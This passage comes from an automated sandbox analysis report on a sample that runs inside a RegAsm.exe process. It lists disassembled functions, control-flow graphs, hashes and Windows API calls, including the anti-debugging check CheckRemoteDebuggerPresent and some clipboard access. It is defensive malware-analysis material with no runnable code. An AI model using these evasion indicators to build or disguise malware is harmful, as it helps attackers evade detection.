                                Function 061765F8 Relevance: .8, Instructions: 820COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6d5236192b36c9216d7264641ab72c0067ce2ca34a8131b2f4b01579fe1c14d
                                • Instruction ID: a5745682fc3f4680770bab9e89de96e9d048faad697ede79192b73e5ff44928a
                                • Opcode Fuzzy Hash: c6d5236192b36c9216d7264641ab72c0067ce2ca34a8131b2f4b01579fe1c14d
                                • Instruction Fuzzy Hash: 6B62AF30B006048FDB54DB68D594BADB7F2EF88314F248569E40AEB395DB35ED86CB90
                                Function 0617C180 Relevance: .6, Instructions: 643COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7e668f2919e420f2753e8fd2a1adbd6a8f313f99a8580bca2380967cee57bef
                                • Instruction ID: ca429c4e3c84505acd76fec8b42dd396836d3c16c397723098061cffec30aed7
                                • Opcode Fuzzy Hash: a7e668f2919e420f2753e8fd2a1adbd6a8f313f99a8580bca2380967cee57bef
                                • Instruction Fuzzy Hash: 4D329D34B006098FEB54DF68D990BAEB7B2EB88314F10856AE505EB355DB35EC42CB91
                                Function 0617B22A Relevance: .6, Instructions: 577COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 13ed1c3058228df0dafa392a95027e1315946221e7193751a270b607667e4e5b
                                • Instruction ID: 3034e36d035c2d889249b773451f31aa6f1cd9393443f791253f8ea33d4caa4e
                                • Opcode Fuzzy Hash: 13ed1c3058228df0dafa392a95027e1315946221e7193751a270b607667e4e5b
                                • Instruction Fuzzy Hash: 11225D30E082098FDF64DF68C4907AEB7B2EB89310F248826E459EB395DB35DD85CB51
                                Function 0617ACD0 Relevance: 10.4, Strings: 8, Instructions: 395COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 617acd0-617acee 2 617acf0-617acf3 0->2 3 617acf5-617acf9 2->3 4 617ad04-617ad07 2->4 5 617acff 3->5 6 617aefc-617af06 3->6 7 617ad11-617ad14 4->7 8 617ad09-617ad0e 4->8 5->4 9 617ad16-617ad1f 7->9 10 617ad2e-617ad31 7->10 8->7 11 617af07-617af11 9->11 12 617ad25-617ad29 9->12 13 617ad33-617ad3c 10->13 14 617ad41-617ad44 10->14 22 617af25-617af26 11->22 23 617af13-617af15 11->23 12->10 13->14 15 617aeed-617aef6 14->15 16 617ad4a-617ad4d 14->16 15->6 15->9 18 617ad61-617ad64 16->18 19 617ad4f-617ad5c 16->19 20 617ad87-617ad8a 18->20 21 617ad66-617ad82 18->21 19->18 25 617ada4-617ada6 20->25 26 617ad8c-617ad9f 20->26 21->20 28 617af29-617af3e 22->28 27 617af17-617af24 23->27 23->28 30 617adad-617adb0 25->30 31 617ada8 25->31 26->25 27->22 32 617af40-617af43 28->32 30->2 37 617adb6-617adda 30->37 31->30 33 617af66-617af69 32->33 34 617af45-617af61 32->34 38 617af76-617af79 33->38 39 617af6b-617af75 33->39 34->33 53 617ade0-617adef 37->53 54 617aeea 37->54 43 617af7b call 617b22a 38->43 44 617af88-617af8b 38->44 49 617af81-617af83 43->49 45 617af8d-617af91 44->45 46 617af98-617af9b 44->46 50 617af93 45->50 51 617afa1-617afdc 45->51 46->51 52 617b204-617b206 46->52 49->44 50->46 59 617afe2-617afee 51->59 60 617b1cf-617b1e2 51->60 55 617b20d-617b210 52->55 56 617b208 52->56 63 617ae07-617ae42 call 61765a8 53->63 64 617adf1-617adf7 53->64 54->15 55->32 58 617b216-617b220 55->58 56->55 68 617aff0-617b009 59->68 69 617b00e-617b052 59->69 62 617b1e4 60->62 62->52 80 617ae44-617ae4a 63->80 81 617ae5a-617ae71 63->81 66 617adfb-617adfd 64->66 67 617adf9 64->67 66->63 67->63 68->62 85 617b054-617b066 69->85 86 617b06e-617b0ad 69->86 83 617ae4e-617ae50 80->83 84 617ae4c 80->84 93 617ae73-617ae79 81->93 94 617ae89-617ae9a 81->94 83->81 84->81 85->86 91 617b194-617b1a9 86->91 92 617b0b3-617b18e call 61765a8 86->92 91->60 92->91 97 617ae7d-617ae7f 93->97 98 617ae7b 93->98 101 617aeb2-617aee3 94->101 102 617ae9c-617aea2 94->102 97->94 98->94 101->54 104 617aea6-617aea8 102->104 105 617aea4 102->105 104->101 105->101
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-3823777903
                                • Opcode ID: 2eedaeaec0461ca93c356f891fbdff8ce621b311ef5ccf4dae558909ed834410
                                • Instruction ID: 3cdef896dc947a9508e4efa06d13341a2a2896b842f6d573e771baf039383127
                                • Opcode Fuzzy Hash: 2eedaeaec0461ca93c356f891fbdff8ce621b311ef5ccf4dae558909ed834410
                                • Instruction Fuzzy Hash: F2E17E30F102098FDB59DF69D4406AEB7B2EF89304F20896AE405AB355DF75EC46CB91
                                Function 0617B650 Relevance: 8.0, Strings: 6, Instructions: 473COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-2392861976
                                • Opcode ID: 597cd2259c0123c28cc0de518cdaa3ccf360d8066178c592d17b02452f8898a8
                                • Instruction ID: 7b25606f5a6a3e55885495755a39e05ce4f3840e7c8f393552c8e71973bf0825
                                • Opcode Fuzzy Hash: 597cd2259c0123c28cc0de518cdaa3ccf360d8066178c592d17b02452f8898a8
                                • Instruction Fuzzy Hash: 4F027C30E042098FDFA4CF68D4806AEB7B2FB85314F24896AE415DB355DB35ED85CB91
                                Function 06179150 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 428 6179150-6179175 429 6179177-617917a 428->429 430 6179180-6179195 429->430 431 6179a38-6179a3b 429->431 438 6179197-617919d 430->438 439 61791ad-61791c3 430->439 432 6179a61-6179a63 431->432 433 6179a3d-6179a5c 431->433 434 6179a65 432->434 435 6179a6a-6179a6d 432->435 433->432 434->435 435->429 437 6179a73-6179a7d 435->437 441 61791a1-61791a3 438->441 442 617919f 438->442 445 61791ce-61791d0 439->445 441->439 442->439 446 61791d2-61791d8 445->446 447 61791e8-6179259 445->447 448 61791dc-61791de 446->448 449 61791da 446->449 458 6179285-61792a1 447->458 459 617925b-617927e 447->459 448->447 449->447 464 61792a3-61792c6 458->464 465 61792cd-61792e8 458->465 459->458 464->465 470 6179313-617932e 465->470 471 61792ea-617930c 465->471 476 6179353-6179361 470->476 477 6179330-617934c 470->477 471->470 478 6179363-617936c 476->478 479 6179371-61793eb 476->479 477->476 478->437 485 61793ed-617940b 479->485 486 6179438-617944d 479->486 490 6179427-6179436 485->490 491 617940d-617941c 485->491 486->431 490->485 490->486 491->490
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q
                                • API String ID: 0-2125118731
                                • Opcode ID: bf4e6ec59ef2b9288ebbc8f07053c93e19d22a01e2e4e58b4430dbef6f19597e
                                • Instruction ID: 0cb9ee7490e588c7b0bb54682d333de9cd4ae63822ebf7251fc94fc2e755efd7
                                • Opcode Fuzzy Hash: bf4e6ec59ef2b9288ebbc8f07053c93e19d22a01e2e4e58b4430dbef6f19597e
                                • Instruction Fuzzy Hash: F7915F30F0420A9FDB54DB75D950BAEB3F6AFC9244F1088A9C409EB384EF709D468B91
                                Function 0617CF38 Relevance: 4.6, Strings: 3, Instructions: 803COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 494 617cf38-617cf53 495 617cf55-617cf58 494->495 496 617cfa1-617cfa4 495->496 497 617cf5a-617cf9c 495->497 498 617cfa6-617cfe8 496->498 499 617cfed-617cff0 496->499 497->496 498->499 501 617cff2-617cff4 499->501 502 617cfff-617d002 499->502 506 617d2df-617d2e8 501->506 507 617cffa 501->507 503 617d004-617d046 502->503 504 617d04b-617d04e 502->504 503->504 509 617d050-617d055 504->509 510 617d058-617d05b 504->510 511 617d2f7-617d303 506->511 512 617d2ea-617d2ef 506->512 507->502 509->510 517 617d05d-617d05f 510->517 518 617d06a-617d06d 510->518 513 617d414-617d419 511->513 514 617d309-617d31d 511->514 512->511 523 617d421 513->523 514->523 533 617d323-617d335 514->533 522 617d065 517->522 517->523 519 617d0b6-617d0b9 518->519 520 617d06f-617d0b1 518->520 528 617d102-617d105 519->528 529 617d0bb-617d0fd 519->529 520->519 522->518 524 617d424-617d430 523->524 531 617d436-617d723 524->531 532 617d1a8-617d1b7 524->532 528->524 535 617d10b-617d10e 528->535 529->528 708 617d94a-617d954 531->708 709 617d729-617d72f 531->709 541 617d1c6-617d1d2 532->541 542 617d1b9-617d1be 532->542 555 617d337-617d33d 533->555 556 617d359-617d35b 533->556 539 617d157-617d15a 535->539 540 617d110-617d152 535->540 549 617d1a3-617d1a6 539->549 550 617d15c-617d16b 539->550 540->539 544 617d955-617d968 541->544 545 617d1d8-617d1ea 541->545 542->541 571 617d972-617d98e 544->571 572 617d96a-617d971 544->572 560 617d1ef-617d1f2 545->560 549->532 549->560 557 617d16d-617d172 550->557 558 617d17a-617d186 550->558 566 617d341-617d34d 555->566 567 617d33f 555->567 570 617d365-617d371 556->570 557->558 558->544 569 617d18c-617d19e 558->569 564 617d1f4-617d236 560->564 565 617d23b-617d23e 560->565 564->565 576 617d261-617d264 565->576 577 617d240-617d25c 565->577 578 617d34f-617d357 566->578 567->578 569->549 596 617d373-617d37d 570->596 597 617d37f 570->597 579 617d990-617d993 571->579 572->571 582 617d266-617d27c 576->582 583 617d281-617d284 576->583 577->576 578->570 588 617d9b6-617d9b9 579->588 589 617d995-617d9b1 579->589 582->583 594 617d286-617d2c8 583->594 595 617d2cd-617d2cf 583->595 599 617d9bb call 617daad 588->599 600 617d9c8-617d9cb 588->600 589->588 594->595 602 617d2d6-617d2d9 595->602 603 617d2d1 595->603 607 617d384-617d386 596->607 597->607 616 617d9c1-617d9c3 599->616 610 617d9fe-617da00 600->610 611 617d9cd-617d9f9 600->611 602->495 602->506 603->602 607->523 614 617d38c-617d3a8 call 61765a8 607->614 618 617da07-617da0a 610->618 619 617da02 610->619 611->610 638 617d3b7-617d3c3 614->638 639 617d3aa-617d3af 614->639 616->600 618->579 623 617da0c-617da1b 618->623 619->618 634 617da82-617da97 623->634 635 617da1d-617da80 call 61765a8 623->635 635->634 638->513 640 617d3c5-617d412 638->640 639->638 640->523 710 617d731-617d736 709->710 711 617d73e-617d747 709->711 710->711 711->544 712 617d74d-617d760 711->712 714 617d766-617d76c 712->714 715 617d93a-617d944 712->715 716 617d76e-617d773 714->716 717 617d77b-617d784 714->717 715->708 715->709 716->717 717->544 718 617d78a-617d7ab 717->718 721 617d7ad-617d7b2 718->721 722 617d7ba-617d7c3 718->722 721->722 722->544 723 617d7c9-617d7e6 722->723 723->715 726 617d7ec-617d7f2 723->726 726->544 727 617d7f8-617d811 726->727 729 617d817-617d83e 727->729 730 617d92d-617d934 727->730 729->544 733 617d844-617d84e 729->733 730->715 730->726 733->544 734 617d854-617d86b 733->734 736 617d86d-617d878 734->736 737 617d87a-617d895 734->737 736->737 737->730 742 617d89b-617d8b4 call 61765a8 737->742 746 617d8b6-617d8bb 742->746 747 617d8c3-617d8cc 742->747 746->747 747->544 748 617d8d2-617d926 747->748 748->730
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q
                                • API String ID: 0-831282457
                                • Opcode ID: 2ed764b7fdce10a94bc6662f256d473a7cb07bb4583ffa4c080c92f45361e464
                                • Instruction ID: 83b644efc9d6672b3de2330d4ef62bdd3573cfb2deeefe071b2de15ea082e9aa
                                • Opcode Fuzzy Hash: 2ed764b7fdce10a94bc6662f256d473a7cb07bb4583ffa4c080c92f45361e464
                                • Instruction Fuzzy Hash: 15624430A006099FDB55EF68E590A5EB7F2FF85304F248969D0099F369DB71ED4ACB80
                                Function 06174B58 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 756 6174b58-6174b7c 757 6174b7e-6174b81 756->757 758 6174b87-6174c7f 757->758 759 6175260-6175263 757->759 779 6174c85-6174cd2 call 6175400 758->779 780 6174d02-6174d09 758->780 760 6175265-617527f 759->760 761 6175284-6175286 759->761 760->761 762 617528d-6175290 761->762 763 6175288 761->763 762->757 766 6175296-61752a3 762->766 763->762 793 6174cd8-6174cf4 779->793 781 6174d0f-6174d7f 780->781 782 6174d8d-6174d96 780->782 799 6174d81 781->799 800 6174d8a 781->800 782->766 797 6174cf6 793->797 798 6174cff-6174d00 793->798 797->798 798->780 799->800 800->782
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: fcq$XPcq$\Ocq
                                • API String ID: 0-3575482020
                                • Opcode ID: a546d8d52165831066aa4cb7b596d86d6c75ac9637da959337e53fed5fef24b1
                                • Instruction ID: 1fbfc08313eaf0a14f895795e877d2e81e9955659e6b395a747fac97e66d8704
                                • Opcode Fuzzy Hash: a546d8d52165831066aa4cb7b596d86d6c75ac9637da959337e53fed5fef24b1
                                • Instruction Fuzzy Hash: 88616230F402189FEB549FB9C8547AEBAF6FF88700F20842AE105AB395DF754D058B95
                                Function 06179142 Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1716 6179142-6179175 1719 6179177-617917a 1716->1719 1720 6179180-6179195 1719->1720 1721 6179a38-6179a3b 1719->1721 1728 6179197-617919d 1720->1728 1729 61791ad-61791c3 1720->1729 1722 6179a61-6179a63 1721->1722 1723 6179a3d-6179a5c 1721->1723 1724 6179a65 1722->1724 1725 6179a6a-6179a6d 1722->1725 1723->1722 1724->1725 1725->1719 1727 6179a73-6179a7d 1725->1727 1731 61791a1-61791a3 1728->1731 1732 617919f 1728->1732 1735 61791ce-61791d0 1729->1735 1731->1729 1732->1729 1736 61791d2-61791d8 1735->1736 1737 61791e8-6179259 1735->1737 1738 61791dc-61791de 1736->1738 1739 61791da 1736->1739 1748 6179285-61792a1 1737->1748 1749 617925b-617927e 1737->1749 1738->1737 1739->1737 1754 61792a3-61792c6 1748->1754 1755 61792cd-61792e8 1748->1755 1749->1748 1754->1755 1760 6179313-617932e 1755->1760 1761 61792ea-617930c 1755->1761 1766 6179353-6179361 1760->1766 1767 6179330-617934c 1760->1767 1761->1760 1768 6179363-617936c 1766->1768 1769 6179371-61793eb 1766->1769 1767->1766 1768->1727 1775 61793ed-617940b 1769->1775 1776 6179438-617944d 1769->1776 1780 6179427-6179436 1775->1780 1781 617940d-617941c 1775->1781 1776->1721 1780->1775 1780->1776 1781->1780
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q
                                • API String ID: 0-355816377
                                • Opcode ID: 02b4a3ce13706fbd5daa9401e2f5824cd650091208532f2f0860c5ec944c631f
                                • Instruction ID: 42d7c410da911a00fe2da5ee70a22393dd7e5e8720a95c300328a5e7a3d7456a
                                • Opcode Fuzzy Hash: 02b4a3ce13706fbd5daa9401e2f5824cd650091208532f2f0860c5ec944c631f
                                • Instruction Fuzzy Hash: 0E517030B041059FDB54EBB4D990BAEB3F6ABC9654F1488A9C409EB384EF70DC428B95
                                Function 00EAF2D0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2003 eaf2d0-eaf2eb 2004 eaf2ed-eaf314 2003->2004 2005 eaf315-eaf32b 2003->2005 2027 eaf32d call eaf3b8 2005->2027 2028 eaf32d call eaf2d0 2005->2028 2008 eaf332-eaf334 2009 eaf33a-eaf378 2008->2009 2010 eaf336-eaf337 2008->2010 2011 eaf338-eaf339 2009->2011 2016 eaf37a-eaf399 2009->2016 2010->2011 2019 eaf39b-eaf39e 2016->2019 2020 eaf39f-eaf42c GlobalMemoryStatusEx 2016->2020 2023 eaf42e-eaf434 2020->2023 2024 eaf435-eaf45d 2020->2024 2023->2024 2027->2008 2028->2008
                                Memory Dump Source
                                • Source File: 00000003.00000002.3558473581.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_ea0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 65a5df7b01ab27237830f1512330cb356c80c72ddbaedda7d15ac235af99502e
                                • Instruction ID: 60b9cb985f27d300442ce10866ba5eda23c12b692eb5e39f4ec17ecc8b2677fd
                                • Opcode Fuzzy Hash: 65a5df7b01ab27237830f1512330cb356c80c72ddbaedda7d15ac235af99502e
                                • Instruction Fuzzy Hash: 67410332D043958FCB14CFB9D8046EEBFF1AF8A310F1885ABD444A7251DB74A845C791
                                Function 060F2B53 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2029 60f2b53-60f2bbe 2031 60f2bc9-60f2bd0 2029->2031 2032 60f2bc0-60f2bc6 2029->2032 2033 60f2bdb-60f2c13 2031->2033 2034 60f2bd2-60f2bd8 2031->2034 2032->2031 2035 60f2c1b-60f2c7a CreateWindowExW 2033->2035 2034->2033 2036 60f2c7c-60f2c82 2035->2036 2037 60f2c83-60f2cbb 2035->2037 2036->2037 2041 60f2cbd-60f2cc0 2037->2041 2042 60f2cc8 2037->2042 2041->2042 2043 60f2cc9 2042->2043 2043->2043
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060F2C6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: b9977cfc8099dcd30f3fbc9448a2206079f605fdbd01178c5ed15babc4ec9128
                                • Instruction ID: 664f77e321226ff5569bf39ab37bfb825599042be3c673328721acf429bc9de0
                                • Opcode Fuzzy Hash: b9977cfc8099dcd30f3fbc9448a2206079f605fdbd01178c5ed15babc4ec9128
                                • Instruction Fuzzy Hash: BD51D1B1D103499FDB14CFA9C884ADEBFF5BF48310F24852AE818AB210D7759985CF91
                                Function 060F2B58 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2044 60f2b58-60f2bbe 2045 60f2bc9-60f2bd0 2044->2045 2046 60f2bc0-60f2bc6 2044->2046 2047 60f2bdb-60f2c7a CreateWindowExW 2045->2047 2048 60f2bd2-60f2bd8 2045->2048 2046->2045 2050 60f2c7c-60f2c82 2047->2050 2051 60f2c83-60f2cbb 2047->2051 2048->2047 2050->2051 2055 60f2cbd-60f2cc0 2051->2055 2056 60f2cc8 2051->2056 2055->2056 2057 60f2cc9 2056->2057 2057->2057
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060F2C6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: d7f99288760e5f700e901c610fc43c74f67a4d764b22f27920513ed7ce211a41
                                • Instruction ID: db99a5f5f2f4d01fab22bc2505e8a457e874d4b87a31fbc4087d551555bd2578
                                • Opcode Fuzzy Hash: d7f99288760e5f700e901c610fc43c74f67a4d764b22f27920513ed7ce211a41
                                • Instruction Fuzzy Hash: DA41D0B1D103099FDB14CF9AC884ADEBFF1BF48310F24852AE818AB210D7749985CF91
                                Function 060F66E4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2058 60f66e4-60f7a6c 2061 60f7b1c-60f7b3c call 60f2d04 2058->2061 2062 60f7a72-60f7a77 2058->2062 2070 60f7b3f-60f7b4c 2061->2070 2063 60f7aca-60f7b02 CallWindowProcW 2062->2063 2064 60f7a79-60f7ab0 2062->2064 2066 60f7b0b-60f7b1a 2063->2066 2067 60f7b04-60f7b0a 2063->2067 2071 60f7ab9-60f7ac8 2064->2071 2072 60f7ab2-60f7ab8 2064->2072 2066->2070 2067->2066 2071->2070 2072->2071
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 060F7AF1
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: ed3eb24ea322d25c86801c4ebe88390502e4783d7b463e4d0478edc6bd607fc8
                                • Instruction ID: 764c0cfba75322aa3520d12fc59da45bc03c5594cfc215382c7415c520d25522
                                • Opcode Fuzzy Hash: ed3eb24ea322d25c86801c4ebe88390502e4783d7b463e4d0478edc6bd607fc8
                                • Instruction Fuzzy Hash: ED4169B4910349CFDB44CF89D888AAABBF5FF88314F24C859D519AB320C774A841CBA1
                                Function 060F876D Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 55e31de2f1cefc533a7f32dd2158c7f0f80d4c61a62da68af23bbe2a2029bea2
                                • Instruction ID: d6439081fd7f0cd79018b119b80d78cbf129b693c4c3735d0b3f484ba29e3edb
                                • Opcode Fuzzy Hash: 55e31de2f1cefc533a7f32dd2158c7f0f80d4c61a62da68af23bbe2a2029bea2
                                • Instruction Fuzzy Hash: 433122B0D01248EFDB50CF99C984BCEBFF5AF48314F248019E504BB290D7B5A986CBA5
                                Function 060F8140 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 2189820a0884a9645a06e233cbb804b2e01d94145c7c13c07fc2c76daf0b8c3a
                                • Instruction ID: 069f929ec4af90eaaf26dc0069379a2927a15e64c56d40a31d1fc4428a2cf858
                                • Opcode Fuzzy Hash: 2189820a0884a9645a06e233cbb804b2e01d94145c7c13c07fc2c76daf0b8c3a
                                • Instruction Fuzzy Hash: 4C3112B0D41248DFDB50DF99C984BDDBFF5AF48314F248029E504BB290D7B4A985CB95
                                Function 00EA71C8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00EA7247
                                Memory Dump Source
                                • Source File: 00000003.00000002.3558473581.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_ea0000_RegAsm.jbxd
                                Similarity
                                • API ID: CheckDebuggerPresentRemote
                                • String ID:
                                • API String ID: 3662101638-0
                                • Opcode ID: 363c68172b69bd6011e87ca70af9fa779d865bcc983ca7507d2ad541b614c094
                                • Instruction ID: a99a0c149359c4a987b32b496d164df5fb775731f0e039dcc623a7b941c03f0a
                                • Opcode Fuzzy Hash: 363c68172b69bd6011e87ca70af9fa779d865bcc983ca7507d2ad541b614c094
                                • Instruction Fuzzy Hash: 0A2169B1801259CFCB10CF9AD884BEEBFF4AF49320F18846AE485B7251C378A944CF61
                                Function 060F6B98 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F6C27
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: d809df72e059f45666beea3c018207bc5c2f7c642792b4c4423d260956d58115
                                • Instruction ID: a50b54e3f333b6008704d36d64cef6b99386c2c41fceea60f7da7ce51add39a2
                                • Opcode Fuzzy Hash: d809df72e059f45666beea3c018207bc5c2f7c642792b4c4423d260956d58115
                                • Instruction Fuzzy Hash: 6921E9B5911248DFDB10DFAAD984ADEFFF4EB48310F14841AE954A3311C375A944CFA5
                                Function 060F6BA0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F6C27
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 3b423fe348f545b9ff022b8412ee4ba934535be2194f5c2114cd422a32a75d3d
                                • Instruction ID: a805583cf1f04458c93082abb81cbc8f551b6189e706643f2a3f3c6be44cb3b4
                                • Opcode Fuzzy Hash: 3b423fe348f545b9ff022b8412ee4ba934535be2194f5c2114cd422a32a75d3d
                                • Instruction Fuzzy Hash: 0D21C4B59102589FDB10CF9AD984AEEBFF4EB48320F14841AE958A7310D375A944CFA5
                                Function 060F6720 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,060F7D45), ref: 060F7DCF
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 7853865c0deaa5df87d74e6b8c850cdba61ee4e1856b8bed726b7c10532b49a6
